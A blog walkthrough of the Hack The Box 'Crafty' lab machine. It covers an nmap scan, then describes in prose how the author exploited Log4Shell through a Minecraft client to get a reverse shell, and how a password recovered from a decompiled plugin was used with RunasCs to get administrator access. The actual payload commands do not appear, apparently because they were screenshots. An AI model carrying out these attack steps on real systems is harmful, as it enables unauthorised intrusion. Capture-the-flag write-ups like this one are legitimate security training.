In this post, I would like to share a walkthrough of the Crafty Machine from Hack the Box
This room will be considered an Easy machine on Hack the Box
What will you gain from the Crafty machine?
For the user flag, you must exploit a Minecraft server, which is particularly vulnerable to the Log4Shell exploit due to its use of the Java Log4J package, I will connect using a free Minecraft command-line client. By sending a Log4Shell payload, I will gain shell access to the system.
As for the root flag, you need to locate and analyze a plugin for the Minecraft server to uncover the administrator password.
Information Gathering on Crafty Machine
Once we have started the VPN connection which requires a download from Hackthebox, we can start
┌─[darknite@parrot]─[~/Documents/htb/crafty]
└──╼ $nmap -sV -sC 10.10.11.249 -oA initial
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-14 17:00 EDT
Nmap scan report for 10.10.11.249
Host is up (0.28s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://crafty.htb
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.57 seconds
┌─[darknite@parrot]─[~/Documents/htb/crafty]
└──╼ $
Let’s access the website interface
It looks like a website that hosts a game online
At the bottom of the website, it provides one subdomain that doesn’t show any valid interface.
At this point, I was stuck on the machine for almost 3 hours, and I didn’t receive any useful information
CVE-2021-44228 vulnerability on Crafty machine
After thinking hard, I did remember that Minecraft system is been vulnerable to log4j and that’s thanks for John Hammond’s video a long time ago
Therefore, let’s exploit that vulnerability from John Hammond’s video and apply it here. To use the exploit, you can download the exploit here to proceed further
Therefore, let’s install the exploit payload into our attacker’s machine
The screenshot above show the content of the file inside the github
As a result, we need to modify the content on “String cmd” with cmd.exe because the victim’s machine is based on the Windows Operating System.
We need to fulfil the required which need to install jdk1.8.0 181 on our attacker’s machine
However, we need to rename the directory from jdk1.8.0.1_181 into jdk1.8.0.1_20
Next, we need to start our listener on the attacker’s machine
Aside from that, we also need to run the log4j-shell payload as shown above
We also required to download pyCraft on our attacker’s machine
To be cautious of the tools, let’s run it within the docker environment
It will take a few minutes to fully configure the requirement
We can paste the command that we found earlier here which it will provide back the reverse shell connection to us
At last, we have successfully retrieved the reverse shell
We can read the user flag by typing the “type user.txt” command
Escalate to Root Privileges Access on Crafty machine
We need to download one file from plugins directory into our attacker’s machine
Analysis using Java decompiler
For this purpose, we need to use jd-gui to read the content within the .jar file format
We can start the java decompiler with the command above
At last, we managed to obtain the password for the next step
Let’s upload the malicious exe file and RunasCs.exe into the victim’s machine
We can use the command above to retrieve administrator’s shell
We can read the root flag by typing the “type root.txt” command